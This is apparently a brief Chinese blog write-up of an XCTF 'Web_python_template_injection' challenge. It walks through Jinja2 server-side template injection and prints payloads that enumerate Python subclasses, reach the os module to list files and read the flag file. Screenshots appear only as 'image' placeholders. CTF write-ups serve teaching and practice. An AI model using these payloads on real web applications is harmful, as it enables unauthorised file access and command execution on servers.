攻防世界|Web_python_template_injection|SSTI-jinja2|

image
image

查看object对象下所有的类,从而筛选出可以利用的类
{{''.__class__.__mro__[2].__subclasses__()}}

<type 'file>'类型可以读取文件
image
它的序列为[40]

<class'site._Printer'>类型(可以进行命令执行)
image

{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
查找目录
image
发现flag文件

{{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}}
image

另解

image

posted @ 2025-08-28 17:11  Dragon_Roar  阅读(2)  评论(0)    收藏  举报